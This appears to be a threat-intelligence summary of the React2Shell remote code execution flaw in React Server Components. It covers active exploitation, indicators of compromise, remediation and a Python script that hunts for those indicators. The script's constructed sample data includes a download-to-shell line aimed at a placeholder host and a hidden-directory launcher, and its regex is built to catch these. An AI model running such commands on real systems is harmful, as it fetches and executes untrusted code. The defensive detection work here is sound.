Full Report
Who hasn't exploited this max-severity flaw? At least five more Chinese spy crews, Iran-linked goons, and financially motivated criminals are now attacking the React2Shell, a maximum-severity flaw in the widely used React JavaScript library, according to Google.…
Analysis Summary
# Vulnerability: React2Shell RCE in React JavaScript Library
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: Not explicitly stated, but noted as "maximum-severity flaw"
- CWE: Not explicitly available in the text
## Affected Systems
- Products: React JavaScript library (specifically React Server Components)
- Versions: Fixed versions were released on December 3rd; affected versions are those predating that release (implied, specific version numbers not given).
- Configurations: Implicated specifically with React Server Components.
## Vulnerability Description
The vulnerability, dubbed "React2Shell," is a maximum-severity flaw within the widely used React JavaScript library. It allows unauthenticated attackers to remotely execute code (RCE).
## Exploitation
- Status: Exploited in the wild (Actively and widely exploited by multiple threat groups, including state-sponsored actors from China and Iran, as well as financially motivated criminals). PoC code has been shared in underground forums.
- Complexity: Low (The text implies ease of exploitation given the immediate and widespread activity following disclosure).
- Attack Vector: Network (Remote execution capability).
## Impact
- Confidentiality: High (Implied, due to deployment of backdoors/tunnelers).
- Integrity: High (Implied, due to deployment of backdoors, miners, and payload delivery).
- Availability: High (Implied, via denial-of-service conditions tied to related CVEs, and resource exhaustion from malware such as crypto-miners).
## Remediation
### Patches
- Patches were made available by React maintainers on December 3rd. Specific patch versions are not listed; users should consult official React documentation for the latest version incorporating the fix.
### Workarounds
- Monitor network traffic for outbound connections initiated by web server processes, specifically looking for `wget` or `cURL` commands.
- Hunt for newly created hidden directories, such as `$HOME/.systemd-utils`.
- Hunt for unauthorized termination of processes, specifically looking for `ntpclient`.
- Hunt for the injection of malicious execution logic into shell configuration files like `$HOME/.bashrc`.
## Detection
- Indicators of Compromise (IOCs):
  - Outbound connections from web server processes using `wget` or `cURL`.
  - Newly created hidden directories matching patterns like `$HOME/.systemd-utils`.
  - Termination of the `ntpclient` process.
  - Malicious code injected into `$HOME/.bashrc`.
- Detection methods and tools: Use threat intelligence (IOCs) provided in Google's report to scan logs and network egress points.
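The hunting steps under Workarounds and the IOC list above describe the same four checks; the script below runs them over a small set of constructed endpoint records. It is an added example, not code from Google's report or the React project: the record field names (`event`, `parent`, `cmd`, `target`, `path`, `created`), the list of web server process names, and the regex used to recognise "execution logic injected into a shell rc file" are this script's own assumptions, while `.systemd-utils` and `ntpclient` come from the report.

```python
"""Hunt for the React2Shell post-exploitation indicators listed in the report.

Added example. All telemetry below is constructed for illustration; the
record layout is an assumption of this script, not any EDR's real schema.
"""
import re
from datetime import datetime, timezone
from pathlib import PurePosixPath

# Assumption: process names a React/Next.js server or its front proxy runs under.
WEB_SERVER_PROCS = {"node", "nginx", "apache2", "httpd"}
DOWNLOADERS = {"wget", "curl"}
IOC_HIDDEN_DIR = ".systemd-utils"   # hidden directory name from the report
IOC_KILLED_PROC = "ntpclient"       # process the report says gets terminated
# Heuristic (assumption): a download piped straight into a shell, or any
# reference to the IOC directory, counts as injected execution logic.
RC_INJECTION = re.compile(r"(curl|wget)[^|\n]*\|\s*(ba)?sh|\.systemd-utils")


def check_process_events(events):
    """Flag wget/curl spawned by a web server process, and kills of ntpclient."""
    findings = []
    for ev in events:
        if ev["event"] == "exec":
            child = PurePosixPath(ev["cmd"].split()[0]).name
            if ev["parent"] in WEB_SERVER_PROCS and child in DOWNLOADERS:
                findings.append(("downloader_from_webserver", ev))
        elif ev["event"] == "kill" and ev["target"] == IOC_KILLED_PROC:
            findings.append(("ntpclient_terminated", ev))
    return findings


def check_hidden_dirs(dir_entries, since):
    """Flag hidden dirs created after `since`; the exact IOC name is flagged regardless of age."""
    findings = []
    for d in dir_entries:
        name = PurePosixPath(d["path"]).name
        if not name.startswith("."):
            continue
        if name == IOC_HIDDEN_DIR:
            findings.append(("ioc_hidden_dir", d))
        elif d["created"] >= since:
            findings.append(("new_hidden_dir", d))
    return findings


def check_rc_file(lines):
    """Flag shell rc lines matching the injection heuristic."""
    return [("rc_injection", ln) for ln in lines if RC_INJECTION.search(ln)]


def hunt(events, dir_entries, rc_lines, since):
    """Run all four checks and return a list of (finding_kind, record) tuples."""
    return (check_process_events(events)
            + check_hidden_dirs(dir_entries, since)
            + check_rc_file(rc_lines))


# --- constructed sample telemetry (not real data) ---
SINCE = datetime(2025, 12, 3, tzinfo=timezone.utc)   # disclosure/patch date
SAMPLE_EVENTS = [
    {"event": "exec", "parent": "node", "cmd": "/usr/bin/curl -s http://example.invalid/x -o /tmp/x"},
    {"event": "exec", "parent": "node", "cmd": "/usr/bin/node server.js"},
    {"event": "exec", "parent": "bash", "cmd": "wget https://example.invalid/pkg.tar.gz"},  # admin shell, not flagged
    {"event": "kill", "target": "ntpclient", "signal": 9},
    {"event": "kill", "target": "sleep", "signal": 15},
]
SAMPLE_DIRS = [
    {"path": "/home/app/.systemd-utils", "created": datetime(2025, 12, 4, tzinfo=timezone.utc)},
    {"path": "/home/app/.cache", "created": datetime(2025, 1, 1, tzinfo=timezone.utc)},   # old, not flagged
    {"path": "/home/app/.weird", "created": datetime(2025, 12, 5, tzinfo=timezone.utc)},  # new hidden dir
    {"path": "/home/app/project", "created": datetime(2025, 12, 5, tzinfo=timezone.utc)},  # not hidden
]
SAMPLE_BASHRC = [
    "export PATH=$HOME/bin:$PATH",
    "alias ll='ls -la'",
    "nohup $HOME/.systemd-utils/run >/dev/null 2>&1 &",
    "curl -s http://example.invalid/i.sh | sh",
]

if __name__ == "__main__":
    for kind, detail in hunt(SAMPLE_EVENTS, SAMPLE_DIRS, SAMPLE_BASHRC, SINCE):
        print(f"[{kind}] {detail}")
```

On the sample data the script reports six findings: one downloader launched by `node`, one `ntpclient` kill, the `.systemd-utils` directory, one other hidden directory created after the cutoff, and two `.bashrc` lines. The cutoff date and the web-server process set are the two knobs to adjust for a real fleet; the `.bashrc` regex is deliberately narrow, so treat a miss there as inconclusive rather than clean.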
## References
- Vendor advisories: React maintainers released fixes on December 3rd.
- Relevant links:
  - (Threat actor exploitation details): hxxps://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182/
  - (CVE Record): hxxps://www.cve.org/CVERecord?id=CVE-2025-55182